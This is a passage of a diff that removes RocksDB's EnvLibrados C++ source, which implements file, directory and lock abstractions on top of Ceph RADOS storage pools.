-   *  "scratch[0..n-1]" must be live when "*result" is used.
-   *  If an error was encountered, returns a non-OK status.
-   *
-   *  REQUIRES: External synchronization
-   *
-   * @param n [description]
-   * @param result [description]
-   * @param scratch [description]
-   * @return [description]
-   */
-  Status Read(size_t n, Slice* result, char* scratch) {
-    LOG_DEBUG("[IN]%i\n", (int)n);
-    librados::bufferlist buffer;
-    Status s;
-    int r = _io_ctx->read(_fid, buffer, n, _offset);
-    if (r >= 0) {
-      buffer.copy(0, r, scratch);
-      *result = Slice(scratch, r);
-      _offset += r;
-      s = Status::OK();
-    } else {
-      s = err_to_status(r);
-      if (s == Status::IOError()) {
-        *result = Slice();
-        s = Status::OK();
-      }
-    }
-    LOG_DEBUG("[OUT]%s, %i, %s\n", s.ToString().c_str(), (int)r, buffer.c_str());
-    return s;
-  }
-
-  /**
-   * @brief skip "n" bytes from the file
-   * @details
-   *  Skip "n" bytes from the file. This is guaranteed to be no
-   *  slower that reading the same data, but may be faster.
-   *
-   *  If end of file is reached, skipping will stop at the end of the
-   *  file, and Skip will return OK.
-   *
-   *  REQUIRES: External synchronization
-   *
-   * @param n [description]
-   * @return [description]
-   */
-  Status Skip(uint64_t n) {
-    _offset += n;
-    return Status::OK();
-  }
-
-  /**
-   * @brief noop
-   * @details
-   *  rocksdb has it's own caching capabilities that we should be able to use,
-   *  without relying on a cache here. This can safely be a no-op.
-   *
-   * @param offset [description]
-   * @param length [description]
-   *
-   * @return [description]
-   */
-  Status InvalidateCache(size_t offset, size_t length) {
-    return Status::OK();
-  }
-};
-
-// A file abstraction for randomly reading the contents of a file.
-class LibradosRandomAccessFile : public RandomAccessFile {
-  librados::IoCtx * _io_ctx;
-  std::string _fid;
-  std::string _hint;
-public:
-  LibradosRandomAccessFile(librados::IoCtx * io_ctx, std::string fid, std::string hint):
-    _io_ctx(io_ctx), _fid(fid), _hint(hint) {}
-
-  ~LibradosRandomAccessFile() {}
-
-  /**
-   * @brief read file
-   * @details similar to LibradosSequentialFile::Read
-   *
-   * @param offset [description]
-   * @param n [description]
-   * @param result [description]
-   * @param scratch [description]
-   * @return [description]
-   */
-  Status Read(uint64_t offset, size_t n, Slice* result,
-              char* scratch) const {
-    LOG_DEBUG("[IN]%i\n", (int)n);
-    librados::bufferlist buffer;
-    Status s;
-    int r = _io_ctx->read(_fid, buffer, n, offset);
-    if (r >= 0) {
-      buffer.copy(0, r, scratch);
-      *result = Slice(scratch, r);
-      s = Status::OK();
-    } else {
-      s = err_to_status(r);
-      if (s == Status::IOError()) {
-        *result = Slice();
-        s = Status::OK();
-      }
-    }
-    LOG_DEBUG("[OUT]%s, %i, %s\n", s.ToString().c_str(), (int)r, buffer.c_str());
-    return s;
-  }
-
-  /**
-   * @brief [brief description]
-   * @details Get unique id for each file and guarantee this id is different for each file
-   *
-   * @param id [description]
-   * @param max_size max size of id, it shoud be larger than 16
-   *
-   * @return [description]
-   */
-  size_t GetUniqueId(char* id, size_t max_size) const {
-    // All fid has the same db_id prefix, so we need to ignore db_id prefix
-    size_t s = std::min(max_size, _fid.size());
-    strncpy(id, _fid.c_str() + (_fid.size() - s), s);
-    id[s - 1] = '\0';
-    return s;
-  };
-
-  //enum AccessPattern { NORMAL, RANDOM, SEQUENTIAL, WILLNEED, DONTNEED };
-  void Hint(AccessPattern pattern) {
-    /* Do nothing */
-  }
-
-  /**
-   * @brief noop
-   * @details [long description]
-   *
-   * @param offset [description]
-   * @param length [description]
-   *
-   * @return [description]
-   */
-  Status InvalidateCache(size_t offset, size_t length) {
-    return Status::OK();
-  }
-};
-
-
-// A file abstraction for sequential writing.  The implementation
-// must provide buffering since callers may append small fragments
-// at a time to the file.
-class LibradosWritableFile : public WritableFile {
-  librados::IoCtx * _io_ctx;
-  std::string _fid;
-  std::string _hint;
-  const EnvLibrados * const _env;
-
-  std::mutex _mutex;                 // used to protect modification of all following variables
-  librados::bufferlist _buffer;      // write buffer
-  uint64_t _buffer_size;             // write buffer size
-  uint64_t _file_size;               // this file size doesn't include buffer size
-
-  /**
-   * @brief assuming caller holds lock
-   * @details [long description]
-   * @return [description]
-   */
-  int _SyncLocked() {
-    // 1. sync append data to RADOS
-    int r = _io_ctx->append(_fid, _buffer, _buffer_size);
-    assert(r >= 0);
-
-    // 2. update local variables
-    if (0 == r) {
-      _buffer.clear();
-      _file_size += _buffer_size;
-      _buffer_size = 0;
-    }
-
-    return r;
-  }
-
-public:
-  LibradosWritableFile(librados::IoCtx * io_ctx,
-                       std::string fid,
-                       std::string hint,
-                       const EnvLibrados * const env)
-    : _io_ctx(io_ctx), _fid(fid), _hint(hint), _env(env), _buffer(), _buffer_size(0), _file_size(0) {
-    int ret = _io_ctx->stat(_fid, &_file_size, nullptr);
-
-    // if file not exist
-    if (ret < 0) {
-      _file_size = 0;
-    }
-  }
-
-  ~LibradosWritableFile() {
-    // sync before closeing writable file
-    Sync();
-  }
-
-  /**
-   * @brief append data to file
-   * @details
-   *  Append will save all written data in buffer util buffer size
-   *  reaches buffer max size. Then, it will write buffer into rados
-   *
-   * @param data [description]
-   * @return [description]
-   */
-  Status Append(const Slice& data) {
-    // append buffer
-    LOG_DEBUG("[IN] %i | %s\n", (int)data.size(), data.data());
-    int r = 0;
-
-    std::lock_guard<std::mutex> lock(_mutex);
-    _buffer.append(data.data(), data.size());
-    _buffer_size += data.size();
-
-    if (_buffer_size > _env->_write_buffer_size) {
-      r = _SyncLocked();
-    }
-
-    LOG_DEBUG("[OUT] %i\n", r);
-    return err_to_status(r);
-  }
-
-  /**
-   * @brief not supported
-   * @details [long description]
-   * @return [description]
-   */
-  Status PositionedAppend(
-    const Slice& /* data */,
-    uint64_t /* offset */) {
-    return Status::NotSupported();
-  }
-
-  /**
-   * @brief truncate file to assigned size
-   * @details [long description]
-   *
-   * @param size [description]
-   * @return [description]
-   */
-  Status Truncate(uint64_t size) {
-    LOG_DEBUG("[IN]%lld|%lld|%lld\n", (long long)size, (long long)_file_size, (long long)_buffer_size);
-    int r = 0;
-
-    std::lock_guard<std::mutex> lock(_mutex);
-    if (_file_size > size) {
-      r = _io_ctx->trunc(_fid, size);
-
-      if (r == 0) {
-        _buffer.clear();
-        _buffer_size = 0;
-        _file_size = size;
-      }
-    } else if (_file_size == size) {
-      _buffer.clear();
-      _buffer_size = 0;
-    } else {
-      librados::bufferlist tmp;
-      tmp.claim(_buffer);
-      _buffer.substr_of(tmp, 0, size - _file_size);
-      _buffer_size = size - _file_size;
-    }
-
-    LOG_DEBUG("[OUT] %i\n", r);
-    return err_to_status(r);
-  }
-
-  /**
-   * @brief close file
-   * @details [long description]
-   * @return [description]
-   */
-  Status Close() {
-    LOG_DEBUG("%s | %lld | %lld\n", _hint.c_str(), (long long)_buffer_size, (long long)_file_size);
-    return Sync();
-  }
-
-  /**
-   * @brief flush file,
-   * @details initiate an aio write and not wait
-   *
-   * @return [description]
-   */
-  Status Flush() {
-    librados::AioCompletion *write_completion = librados::Rados::aio_create_completion();
-    int r = 0;
-
-    std::lock_guard<std::mutex> lock(_mutex);
-    r = _io_ctx->aio_append(_fid, write_completion, _buffer, _buffer_size);
-
-    if (0 == r) {
-      _file_size += _buffer_size;
-      _buffer.clear();
-      _buffer_size = 0;
-    }
-
-    write_completion->release();
-
-    return err_to_status(r);
-  }
-
-  /**
-   * @brief write buffer data to rados
-   * @details initiate an aio write and wait for result
-   * @return [description]
-   */
-  Status Sync() { // sync data
-    int r = 0;
-
-    std::lock_guard<std::mutex> lock(_mutex);
-    if (_buffer_size > 0) {
-      r = _SyncLocked();
-    }
-
-    return err_to_status(r);
-  }
-
-  /**
-   * @brief [brief description]
-   * @details [long description]
-   * @return true if Sync() and Fsync() are safe to call concurrently with Append()and Flush().
-   */
-  bool IsSyncThreadSafe() const {
-    return true;
-  }
-
-  /**
-   * @brief Indicates the upper layers if the current WritableFile implementation uses direct IO.
-   * @details [long description]
-   * @return [description]
-   */
-  bool use_direct_io() const {
-    return false;
-  }
-
-  /**
-   * @brief Get file size
-   * @details
-   *  This API will use cached file_size.
-   * @return [description]
-   */
-  uint64_t GetFileSize() {
-    LOG_DEBUG("%lld|%lld\n", (long long)_buffer_size, (long long)_file_size);
-
-    std::lock_guard<std::mutex> lock(_mutex);
-    int file_size = _file_size + _buffer_size;
-
-    return file_size;
-  }
-
-  /**
-   * @brief For documentation, refer to RandomAccessFile::GetUniqueId()
-   * @details [long description]
-   *
-   * @param id [description]
-   * @param max_size [description]
-   *
-   * @return [description]
-   */
-  size_t GetUniqueId(char* id, size_t max_size) const {
-    // All fid has the same db_id prefix, so we need to ignore db_id prefix
-    size_t s = std::min(max_size, _fid.size());
-    strncpy(id, _fid.c_str() + (_fid.size() - s), s);
-    id[s - 1] = '\0';
-    return s;
-  }
-
-  /**
-   * @brief noop
-   * @details [long description]
-   *
-   * @param offset [description]
-   * @param length [description]
-   *
-   * @return [description]
-   */
-  Status InvalidateCache(size_t offset, size_t length) {
-    return Status::OK();
-  }
-
-  using WritableFile::RangeSync;
-  /**
-   * @brief No RangeSync support, just call Sync()
-   * @details [long description]
-   *
-   * @param offset [description]
-   * @param nbytes [description]
-   *
-   * @return [description]
-   */
-  Status RangeSync(off_t offset, off_t nbytes) {
-    return Sync();
-  }
-
-protected:
-  using WritableFile::Allocate;
-  /**
-   * @brief noop
-   * @details [long description]
-   *
-   * @param offset [description]
-   * @param len [description]
-   *
-   * @return [description]
-   */
-  Status Allocate(off_t offset, off_t len) {
-    return Status::OK();
-  }
-};
-
-
-// Directory object represents collection of files and implements
-// filesystem operations that can be executed on directories.
-class LibradosDirectory : public Directory {
-  librados::IoCtx * _io_ctx;
-  std::string _fid;
-public:
-  explicit LibradosDirectory(librados::IoCtx * io_ctx, std::string fid):
-    _io_ctx(io_ctx), _fid(fid) {}
-
-  // Fsync directory. Can be called concurrently from multiple threads.
-  Status Fsync() {
-    return Status::OK();
-  }
-};
-
-// Identifies a locked file.
-// This is exclusive lock and can't nested lock by same thread
-class LibradosFileLock : public FileLock {
-  librados::IoCtx * _io_ctx;
-  const std::string _obj_name;
-  const std::string _lock_name;
-  const std::string _cookie;
-  int lock_state;
-public:
-  LibradosFileLock(
-    librados::IoCtx * io_ctx,
-    const std::string obj_name):
-    _io_ctx(io_ctx),
-    _obj_name(obj_name),
-    _lock_name("lock_name"),
-    _cookie("cookie") {
-
-    // TODO: the lock will never expire. It may cause problem if the process crash or abnormally exit.
-    while (!_io_ctx->lock_exclusive(
-             _obj_name,
-             _lock_name,
-             _cookie,
-             "description", nullptr, 0));
-  }
-
-  ~LibradosFileLock() {
-    _io_ctx->unlock(_obj_name, _lock_name, _cookie);
-  }
-};
-
-
-// --------------------
-// --- EnvLibrados ----
-// --------------------
-/**
- * @brief EnvLibrados ctor
- * @details [long description]
- *
- * @param db_name unique database name
- * @param config_path the configure file path for rados
- */
-EnvLibrados::EnvLibrados(const std::string& db_name,
-                         const std::string& config_path,
-                         const std::string& db_pool)
-  : EnvLibrados("client.admin",
-                "ceph",
-                0,
-                db_name,
-                config_path,
-                db_pool,
-                "/wal",
-                db_pool,
-                1 << 20) {}
-
-/**
- * @brief EnvLibrados ctor
- * @details [long description]
- *
- * @param client_name       first 3 parameters is for RADOS client init
- * @param cluster_name
- * @param flags
- * @param db_name           unique database name, used as db_id key
- * @param config_path the   configure file path for rados
- * @param db_pool the pool  for db data
- * @param wal_pool the pool for WAL data
- * @param write_buffer_size WritableFile buffer max size
- */
-EnvLibrados::EnvLibrados(const std::string& client_name,
-                         const std::string& cluster_name,
-                         const uint64_t flags,
-                         const std::string& db_name,
-                         const std::string& config_path,
-                         const std::string& db_pool,
-                         const std::string& wal_dir,
-                         const std::string& wal_pool,
-                         const uint64_t write_buffer_size)
-  : EnvWrapper(Env::Default()),
-    _client_name(client_name),
-    _cluster_name(cluster_name),
-    _flags(flags),
-    _db_name(db_name),
-    _config_path(config_path),
-    _db_pool_name(db_pool),
-    _wal_dir(wal_dir),
-    _wal_pool_name(wal_pool),
-    _write_buffer_size(write_buffer_size) {
-  int ret = 0;
-
-  // 1. create a Rados object and initialize it
-  ret = _rados.init2(_client_name.c_str(), _cluster_name.c_str(), _flags); // just use the client.admin keyring
-  if (ret < 0) { // let's handle any error that might have come back
-    std::cerr << "couldn't initialize rados! error " << ret << std::endl;
-    ret = EXIT_FAILURE;
-    goto out;
-  }
-
-  // 2. read configure file
-  ret = _rados.conf_read_file(_config_path.c_str());
-  if (ret < 0) {
-    // This could fail if the config file is malformed, but it'd be hard.
-    std::cerr << "failed to parse config file " << _config_path
-              << "! error" << ret << std::endl;
-    ret = EXIT_FAILURE;
-    goto out;
-  }
-
-  // 3. we actually connect to the cluster
-  ret = _rados.connect();
-  if (ret < 0) {
-    std::cerr << "couldn't connect to cluster! error " << ret << std::endl;
-    ret = EXIT_FAILURE;
-    goto out;
-  }
-
-  // 4. create db_pool if not exist
-  ret = _rados.pool_create(_db_pool_name.c_str());
-  if (ret < 0 && ret != -EEXIST && ret !=  -EPERM) {
-    std::cerr << "couldn't create pool! error " << ret << std::endl;
-    goto out;
-  }
-
-  // 5. create db_pool_ioctx
-  ret = _rados.ioctx_create(_db_pool_name.c_str(), _db_pool_ioctx);
-  if (ret < 0) {
-    std::cerr << "couldn't set up ioctx! error " << ret << std::endl;
-    ret = EXIT_FAILURE;
-    goto out;
-  }
-
-  // 6. create wal_pool if not exist
-  ret = _rados.pool_create(_wal_pool_name.c_str());
-  if (ret < 0 && ret != -EEXIST && ret !=  -EPERM) {
-    std::cerr << "couldn't create pool! error " << ret << std::endl;
-    goto out;
-  }
-
-  // 7. create wal_pool_ioctx
-  ret = _rados.ioctx_create(_wal_pool_name.c_str(), _wal_pool_ioctx);
-  if (ret < 0) {
-    std::cerr << "couldn't set up ioctx! error " << ret << std::endl;
-    ret = EXIT_FAILURE;
-    goto out;
-  }
-
-  // 8. add root dir
-  _AddFid(ROOT_DIR_KEY, DIR_ID_VALUE);
-
-out:
-  LOG_DEBUG("rados connect result code : %i\n", ret);
-}
-
-/****************************************************
-  private functions to handle fid operation.
-  Dir also have fid, but the value is DIR_ID_VALUE
-****************************************************/
-
-/**
- * @brief generate a new fid
- * @details [long description]
- * @return [description]
- */
-std::string EnvLibrados::_CreateFid() {
-  return _db_name + "." + GenerateUniqueId();
-}
-
-/**
- * @brief get fid
- * @details [long description]
- *
- * @param fname [description]
- * @param fid [description]
- *
- * @return
- *  Status::OK()
- *  Status::NotFound()
- */
-Status EnvLibrados::_GetFid(
-  const std::string &fname,
-  std::string& fid) {
-  std::set<std::string> keys;
-  std::map<std::string, librados::bufferlist> kvs;
-  keys.insert(fname);
-  int r = _db_pool_ioctx.omap_get_vals_by_keys(_db_name, keys, &kvs);
-
-  if (0 == r && 0 == kvs.size()) {
-    return Status::NotFound();
-  } else if (0 == r && 0 != kvs.size()) {
-    fid.assign(kvs[fname].c_str(), kvs[fname].length());
-    return Status::OK();
-  } else {
-    return err_to_status(r);
-  }
-}
-
-/**
- * @brief rename fid
- * @details Only modify object in rados once,
- * so this rename operation is atomic in term of rados
- *
- * @param old_fname [description]
- * @param new_fname [description]
- *
- * @return [description]
- */
-Status EnvLibrados::_RenameFid(const std::string& old_fname,
-                               const std::string& new_fname) {
-  std::string fid;
-  Status s = _GetFid(old_fname, fid);
-
-  if (Status::OK() != s) {
-    return s;
-  }
-
-  librados::bufferlist bl;
-  std::set<std::string> keys;
-  std::map<std::string, librados::bufferlist> kvs;
-  librados::ObjectWriteOperation o;
-  bl.append(fid);
-  keys.insert(old_fname);
-  kvs[new_fname] = bl;
-  o.omap_rm_keys(keys);
-  o.omap_set(kvs);
-  int r = _db_pool_ioctx.operate(_db_name, &o);
-  return err_to_status(r);
-}
-
-/**
- * @brief add <file path, fid> to metadata object. It may overwrite exist key.
- * @details [long description]
- *
- * @param fname [description]
- * @param fid [description]
- *
- * @return [description]
- */
-Status EnvLibrados::_AddFid(
-  const std::string& fname,
-  const std::string& fid) {
-  std::map<std::string, librados::bufferlist> kvs;
-  librados::bufferlist value;
-  value.append(fid);
-  kvs[fname] = value;
-  int r = _db_pool_ioctx.omap_set(_db_name, kvs);
-  return err_to_status(r);
-}
-
-/**
- * @brief return subfile names of dir.
- * @details
- *  RocksDB has a 2-level structure, so all keys
- *  that have dir as prefix are subfiles of dir.
- *  So we can just return these files' name.
- *
- * @param dir [description]
- * @param result [description]
- *
- * @return [description]
- */
-Status EnvLibrados::_GetSubFnames(
-  const std::string& dir,
-  std::vector<std::string> * result
-) {
-  std::string start_after(dir);
-  std::string filter_prefix(dir);
-  std::map<std::string, librados::bufferlist> kvs;
-  _db_pool_ioctx.omap_get_vals(_db_name,
-                               start_after, filter_prefix,
-                               MAX_ITEMS_IN_FS, &kvs);
-
-  result->clear();
-  for (auto i = kvs.begin(); i != kvs.end(); i++) {
-    result->push_back(i->first.substr(dir.size() + 1));
-  }
-  return Status::OK();
-}
-
-/**
- * @brief delete key fname from metadata object
- * @details [long description]
- *
- * @param fname [description]
- * @return [description]
- */
-Status EnvLibrados::_DelFid(
-  const std::string& fname) {
-  std::set<std::string> keys;
-  keys.insert(fname);
-  int r = _db_pool_ioctx.omap_rm_keys(_db_name, keys);
-  return err_to_status(r);
-}
-
-/**
- * @brief get match IoCtx from _prefix_pool_map
- * @details [long description]
- *
- * @param prefix [description]
- * @return [description]
- *
- */
-librados::IoCtx* EnvLibrados::_GetIoctx(const std::string& fpath) {
-  auto is_prefix = [](const std::string & s1, const std::string & s2) {
-    auto it1 = s1.begin(), it2 = s2.begin();
-    while (it1 != s1.end() && it2 != s2.end() && *it1 == *it2) ++it1, ++it2;
-    return it1 == s1.end();
-  };
-
-  if (is_prefix(_wal_dir, fpath)) {
-    return &_wal_pool_ioctx;
-  } else {
-    return &_db_pool_ioctx;
-  }
-}
-
-/************************************************************
-                public functions
-************************************************************/
-/**
- * @brief generate unique id
- * @details Combine system time and random number.
- * @return [description]
- */
-std::string EnvLibrados::GenerateUniqueId() {
-  Random64 r(time(nullptr));
-  uint64_t random_uuid_portion =
-    r.Uniform(std::numeric_limits<uint64_t>::max());
-  uint64_t nanos_uuid_portion = NowNanos();
-  char uuid2[200];
-  snprintf(uuid2,
-           200,
-           "%16lx-%16lx",
-           (unsigned long)nanos_uuid_portion,
-           (unsigned long)random_uuid_portion);
-  return uuid2;
-}
-
-/**
- * @brief create a new sequential read file handler
- * @details it will check the existence of fname
- *
- * @param fname [description]
- * @param result [description]
- * @param options [description]
- * @return [description]
- */
-Status EnvLibrados::NewSequentialFile(
-  const std::string& fname,
-  std::unique_ptr<SequentialFile>* result,
-  const EnvOptions& options)
-{
-  LOG_DEBUG("[IN]%s\n", fname.c_str());
-  std::string dir, file, fid;
-  split(fname, &dir, &file);
-  Status s;
-  std::string fpath = dir + "/" + file;
-  do {
-    s = _GetFid(dir, fid);
-
-    if (!s.ok() || fid != DIR_ID_VALUE) {
-      if (fid != DIR_ID_VALUE) s = Status::IOError();
-      break;
-    }
-
-    s = _GetFid(fpath, fid);
-
-    if (Status::NotFound() == s) {
-      s = Status::IOError();
-      errno = ENOENT;
-      break;
-    }
-
-    result->reset(new LibradosSequentialFile(_GetIoctx(fpath), fid, fpath));
-    s = Status::OK();
-  } while (0);
-
-  LOG_DEBUG("[OUT]%s\n", s.ToString().c_str());
-  return s;
-}
-
-/**
- * @brief create a new random access file handler
- * @details it will check the existence of fname
- *
- * @param fname [description]
- * @param result [description]
- * @param options [description]
- * @return [description]
- */
-Status EnvLibrados::NewRandomAccessFile(
-  const std::string& fname,
-  std::unique_ptr<RandomAccessFile>* result,
-  const EnvOptions& options)
-{
-  LOG_DEBUG("[IN]%s\n", fname.c_str());
-  std::string dir, file, fid;
-  split(fname, &dir, &file);
-  Status s;
-  std::string fpath = dir + "/" + file;
-  do {
-    s = _GetFid(dir, fid);
-
-    if (!s.ok() || fid != DIR_ID_VALUE) {
-      s = Status::IOError();
-      break;
-    }
-
-    s = _GetFid(fpath, fid);
-
-    if (Status::NotFound() == s) {
-      s = Status::IOError();
-      errno = ENOENT;
-      break;
-    }
-
-    result->reset(new LibradosRandomAccessFile(_GetIoctx(fpath), fid, fpath));
-    s = Status::OK();
-  } while (0);
-
-  LOG_DEBUG("[OUT]%s\n", s.ToString().c_str());
-  return s;
-}
-
-/**
- * @brief create a new write file handler
- * @details it will check the existence of fname
- *
- * @param fname [description]
- * @param result [description]
- * @param options [description]
- * @return [description]
- */
-Status EnvLibrados::NewWritableFile(
-  const std::string& fname,
-  std::unique_ptr<WritableFile>* result,
-  const EnvOptions& options)
-{
-  LOG_DEBUG("[IN]%s\n", fname.c_str());
-  std::string dir, file, fid;
-  split(fname, &dir, &file);
-  Status s;
-  std::string fpath = dir + "/" + file;
-
-  do {
-    // 1. check if dir exist
-    s = _GetFid(dir, fid);
-    if (!s.ok()) {
-      break;
-    }
-
-    if (fid != DIR_ID_VALUE) {
-      s = Status::IOError();
-      break;
-    }
-
-    // 2. check if file exist.
-    // 2.1 exist, use it
-    // 2.2 not exist, create it
-    s = _GetFid(fpath, fid);
-    if (Status::NotFound() == s) {
-      fid = _CreateFid();
-      _AddFid(fpath, fid);
-    }
-
-    result->reset(new LibradosWritableFile(_GetIoctx(fpath), fid, fpath, this));
-    s = Status::OK();
-  } while (0);
-
-  LOG_DEBUG("[OUT]%s\n", s.ToString().c_str());
-  return s;
-}
-
-/**
- * @brief reuse write file handler
- * @details
- *  This function will rename old_fname to new_fname,
- *  then return the handler of new_fname
- *
- * @param new_fname [description]
- * @param old_fname [description]
- * @param result [description]
- * @param options [description]
- * @return [description]
- */
-Status EnvLibrados::ReuseWritableFile(
-  const std::string& new_fname,
-  const std::string& old_fname,
-  std::unique_ptr<WritableFile>* result,
-  const EnvOptions& options)
-{
-  LOG_DEBUG("[IN]%s => %s\n", old_fname.c_str(), new_fname.c_str());
-  std::string src_fid, tmp_fid, src_dir, src_file, dst_dir, dst_file;
-  split(old_fname, &src_dir, &src_file);
-  split(new_fname, &dst_dir, &dst_file);
-
-  std::string src_fpath = src_dir + "/" + src_file;
-  std::string dst_fpath = dst_dir + "/" + dst_file;
-  Status r = Status::OK();
-  do {
-    r = _RenameFid(src_fpath,
-                   dst_fpath);
-    if (!r.ok()) {
-      break;
-    }
-
-    result->reset(new LibradosWritableFile(_GetIoctx(dst_fpath), src_fid, dst_fpath, this));
-  } while (0);
-
-  LOG_DEBUG("[OUT]%s\n", r.ToString().c_str());
-  return r;
-}
-
-/**
- * @brief create a new directory handler
- * @details [long description]
- *
- * @param name [description]
- * @param result [description]
- *
- * @return [description]
- */
-Status EnvLibrados::NewDirectory(
-  const std::string& name,
-  std::unique_ptr<Directory>* result)
-{
-  LOG_DEBUG("[IN]%s\n", name.c_str());
-  std::string fid, dir, file;
-  /* just want to get dir name */
-  split(name + "/tmp", &dir, &file);
-  Status s;
-
-  do {
-    s = _GetFid(dir, fid);
-
-    if (!s.ok() || DIR_ID_VALUE != fid) {
-      s = Status::IOError(name, strerror(-ENOENT));
-      break;
-    }
-
-    if (Status::NotFound() == s) {
-      s = _AddFid(dir, DIR_ID_VALUE);
-      if (!s.ok()) break;
-    } else if (!s.ok()) {
-      break;
-    }
-
-    result->reset(new LibradosDirectory(_GetIoctx(dir), dir));
-    s = Status::OK();
-  } while (0);
-
-  LOG_DEBUG("[OUT]%s\n", s.ToString().c_str());
-  return s;
-}
-
-/**
- * @brief check if fname is exist
- * @details [long description]
- *
- * @param fname [description]
- * @return [description]
- */
-Status EnvLibrados::FileExists(const std::string& fname)
-{
-  LOG_DEBUG("[IN]%s\n", fname.c_str());
-  std::string fid, dir, file;
-  split(fname, &dir, &file);
-  Status s = _GetFid(dir + "/" + file, fid);
-
-  if (s.ok() && fid != DIR_ID_VALUE) {
-    s = Status::OK();
-  }
-
-  LOG_DEBUG("[OUT]%s\n", s.ToString().c_str());
-  return s;
-}
-
-/**
- * @brief get subfile name of dir_in
- * @details [long description]
- *
- * @param dir_in [description]
- * @param result [description]
- *
- * @return [description]
- */
-Status EnvLibrados::GetChildren(
-  const std::string& dir_in,
-  std::vector<std::string>* result)
-{
-  LOG_DEBUG("[IN]%s\n", dir_in.c_str());
-  std::string fid, dir, file;
-  split(dir_in + "/temp", &dir, &file);
-  Status s;
-
-  do {
-    s = _GetFid(dir, fid);
-    if (!s.ok()) {
-      break;
-    }
-
-    if (fid != DIR_ID_VALUE) {
-      s = Status::IOError();
-      break;
-    }
-
-    s = _GetSubFnames(dir, result);
-  } while (0);
-
-  LOG_DEBUG("[OUT]%s\n", s.ToString().c_str());
-  return s;
-}
-
-/**
- * @brief delete fname
- * @details [long description]
- *
- * @param fname [description]
- * @return [description]
- */
-Status EnvLibrados::DeleteFile(const std::string& fname)
-{
-  LOG_DEBUG("[IN]%s\n", fname.c_str());
-  std::string fid, dir, file;
-  split(fname, &dir, &file);
-  Status s = _GetFid(dir + "/" + file, fid);
-
-  if (s.ok() && DIR_ID_VALUE != fid) {
-    s = _DelFid(dir + "/" + file);
-  } else {
-    s = Status::NotFound();
-  }
-  LOG_DEBUG("[OUT]%s\n", s.ToString().c_str());
-  return s;
-}
-
-/**
- * @brief create new dir
- * @details [long description]
- *
- * @param dirname [description]
- * @return [description]
- */
-Status EnvLibrados::CreateDir(const std::string& dirname)
-{
-  LOG_DEBUG("[IN]%s\n", dirname.c_str());
-  std::string fid, dir, file;
-  split(dirname + "/temp", &dir, &file);
-  Status s = _GetFid(dir + "/" + file, fid);
-
-  do {
-    if (Status::NotFound() != s && fid != DIR_ID_VALUE) {
-      break;
-    } else if (Status::OK() == s && fid == DIR_ID_VALUE) {
-      break;
-    }
-
-    s = _AddFid(dir, DIR_ID_VALUE);
-  } while (0);
-
-  LOG_DEBUG("[OUT]%s\n", s.ToString().c_str());
-  return s;
-}
-
-/**
- * @brief create dir if missing
- * @details [long description]
- *
- * @param dirname [description]
- * @return [description]
- */
-Status EnvLibrados::CreateDirIfMissing(const std::string& dirname)
-{
-  LOG_DEBUG("[IN]%s\n", dirname.c_str());
-  std::string fid, dir, file;
-  split(dirname + "/temp", &dir, &file);
-  Status s = Status::OK();
-
-  do {
-    s = _GetFid(dir, fid);
-    if (Status::NotFound() != s) {
-      break;
-    }
-
-    s = _AddFid(dir, DIR_ID_VALUE);
-  } while (0);
-
-  LOG_DEBUG("[OUT]%s\n", s.ToString().c_str());
-  return s;
-}
-
-/**
- * @brief delete dir
- * @details
- *
- * @param dirname [description]
- * @return [description]
- */
-Status EnvLibrados::DeleteDir(const std::string& dirname)
-{
-  LOG_DEBUG("[IN]%s\n", dirname.c_str());
-  std::string fid, dir, file;
-  split(dirname + "/temp", &dir, &file);
-  Status s = Status::OK();
-
-  s = _GetFid(dir, fid);
-
-  if (s.ok() && DIR_ID_VALUE == fid) {
-    std::vector<std::string> subs;
-    s = _GetSubFnames(dir, &subs);
-    // if subfiles exist, can't delete dir
-    if (subs.size() > 0) {
-      s = Status::IOError();
-    } else {
-      s = _DelFid(dir);
-    }
-  } else {
-    s = Status::NotFound();
-  }
-
-  LOG_DEBUG("[OUT]%s\n", s.ToString().c_str());
-  return s;
-}
-
-/**
- * @brief return file size
- * @details [long description]
- *
- * @param fname [description]
- * @param file_size [description]
- *
- * @return [description]
- */
-Status EnvLibrados::GetFileSize(
-  const std::string& fname,
-  uint64_t* file_size)
-{
-  LOG_DEBUG("[IN]%s\n", fname.c_str());
-  std::string fid, dir, file;
-  split(fname, &dir, &file);
-  time_t mtime;
-  Status s;
-
-  do {
-    std::string fpath = dir + "/" + file;
-    s = _GetFid(fpath, fid);
-
-    if (!s.ok()) {
-      break;
-    }
-
-    int ret = _GetIoctx(fpath)->stat(fid, file_size, &mtime);
-    if (ret < 0) {
-      LOG_DEBUG("%i\n", ret);
-      if (-ENOENT == ret) {
-        *file_size = 0;
-        s = Status::OK();
-      } else {
-        s = err_to_status(ret);
-      }
-    } else {
-      s = Status::OK();
-    }
-  } while (0);
-
-  LOG_DEBUG("[OUT]%s|%lld\n", s.ToString().c_str(), (long long)*file_size);
-  return s;
-}
-
-/**
- * @brief get file modification time
- * @details [long description]
- *
- * @param fname [description]
- * @param file_mtime [description]
- *
- * @return [description]
- */
-Status EnvLibrados::GetFileModificationTime(const std::string& fname,
-    uint64_t* file_mtime)
-{
-  LOG_DEBUG("[IN]%s\n", fname.c_str());
-  std::string fid, dir, file;
-  split(fname, &dir, &file);
-  time_t mtime;
-  uint64_t file_size;
-  Status s = Status::OK();
-  do {
-    std::string fpath = dir + "/" + file;
-    s = _GetFid(dir + "/" + file, fid);
-
-    if (!s.ok()) {
-      break;
-    }
-
-    int ret = _GetIoctx(fpath)->stat(fid, &file_size, &mtime);
-    if (ret < 0) {
-      if (Status::NotFound() == err_to_status(ret)) {
-        *file_mtime = static_cast<uint64_t>(mtime);
-        s = Status::OK();
-      } else {
-        s = err_to_status(ret);
-      }
-    } else {
-      s = Status::OK();
-    }
-  } while (0);
-
-  LOG_DEBUG("[OUT]%s\n", s.ToString().c_str());
-  return s;
-}
-
-/**
- * @brief rename file
- * @details
- *
- * @param src [description]
- * @param target_in [description]
- *
- * @return [description]
- */
-Status EnvLibrados::RenameFile(
-  const std::string& src,
-  const std::string& target_in)
-{
-  LOG_DEBUG("[IN]%s => %s\n", src.c_str(), target_in.c_str());
-  std::string src_fid, tmp_fid, src_dir, src_file, dst_dir, dst_file;
-  split(src, &src_dir, &src_file);
-  split(target_in, &dst_dir, &dst_file);
-
-  auto s = _RenameFid(src_dir + "/" + src_file,
-                      dst_dir + "/" + dst_file);
-  LOG_DEBUG("[OUT]%s\n", s.ToString().c_str());
-  return s;
-}
-
-/**
- * @brief not support
- * @details [long description]
- *
- * @param src [description]
- * @param target_in [description]
- *
